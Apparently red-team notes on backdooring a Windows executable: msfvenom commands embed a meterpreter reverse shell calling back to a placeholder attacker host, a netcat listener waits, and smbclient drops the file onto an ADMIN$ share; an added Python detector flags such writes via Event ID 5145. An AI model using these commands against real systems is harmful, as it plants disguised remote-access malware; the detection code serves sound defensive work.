TROJAN BACKDOOR
INJECTING BACKDOOR
root@oco:~$ msfvenom -a x64 --platform windows -x {executableName}.exe -k -p windows/meterpreter/reverse_tcp lhost={attackerIP} lport={attackerPort} -b "\x00" -f exe -o {executableName}.exe
DROPPING TO A WRITABLE SHARE
root@oco:~$ nc -nlvp {attackerPort}
root@oco:~$ msfvenom -a x64 --platform windows -x {executableName}.exe -k -p windows/meterpreter/reverse_tcp lhost={attackerIP} lport={attackerPort} -b "\x00" -f exe -o {executableName}.exe
* -k keeps the original functionality of the executable.
* -b "\x00" specifies bad characters to avoid in the payload, such as null bytes (\x00). These are typically characters that would break the exploit if included.
root@oco:~$ smbclient -c 'put {executableName}.exe' -U {user} -W {domain} '//{ipAddress}/admin$/' {password}
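From the defender's side, the `put` to `admin$` above is recorded when detailed file share auditing is enabled: Windows logs Security Event ID 5145 for each share access. The following Python is an added example, not part of the original notes. The event dictionaries are constructed samples, and the watched share and extension lists are assumptions to tune.

```python
# Added example: flag executable writes to administrative shares using
# Windows Security Event ID 5145 (detailed file share auditing).
WRITE_BITS = 0x2 | 0x4                       # FILE_WRITE_DATA | FILE_APPEND_DATA
ADMIN_SHARES = {"ADMIN$", "C$"}              # assumption: shares to watch
EXEC_EXT = (".exe", ".dll", ".scr", ".sys")  # assumption: extensions to watch

# Constructed sample events (all values made up), reduced to the fields used.
SAMPLE_EVENTS = [
    {"EventID": 5145, "SubjectUserName": "jsmith", "IpAddress": "10.0.5.23",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "updater.exe",
     "AccessMask": "0x2"},                   # write of an .exe: flagged
    {"EventID": 5145, "SubjectUserName": "jsmith", "IpAddress": "10.0.5.23",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": r"System32\kernel32.dll",
     "AccessMask": "0x1"},                   # read only: ignored
    {"EventID": 5145, "SubjectUserName": "svc_deploy", "IpAddress": "10.0.1.10",
     "ShareName": r"\\*\Public", "RelativeTargetName": "tool.exe",
     "AccessMask": "0x2"},                   # not an admin share: ignored
    {"EventID": 5145, "SubjectUserName": "svc_deploy", "IpAddress": "10.0.1.10",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"Windows\Temp\svc.EXE",
     "AccessMask": "0x120196"},              # combined mask with write bits: flagged
    {"EventID": 4624, "SubjectUserName": "jsmith", "IpAddress": "10.0.5.23"},
]

def share_name(event):
    # Reduce the logged share path to its last component, upper-cased.
    return event.get("ShareName", "").rsplit("\\", 1)[-1].upper()

def is_exe_write_to_admin_share(event):
    if event.get("EventID") != 5145:
        return False
    try:
        mask = int(event.get("AccessMask", "0"), 16)
    except ValueError:                       # malformed mask: skip the event
        return False
    target = event.get("RelativeTargetName", "").lower()
    return (share_name(event) in ADMIN_SHARES
            and (mask & WRITE_BITS) != 0
            and target.endswith(EXEC_EXT))

def find_exe_drops(events):
    # Return (user, source IP, target path) for every flagged event.
    return [(e["SubjectUserName"], e["IpAddress"], e["RelativeTargetName"])
            for e in events if is_exe_write_to_admin_share(e)]

if __name__ == "__main__":
    for user, ip, path in find_exe_drops(SAMPLE_EVENTS):
        print(f"ALERT exe write to admin share: user={user} src={ip} file={path}")
```

Legitimate remote administration tools also write executables to ADMIN$, so hits are best triaged against an allowlist of expected source hosts and service accounts.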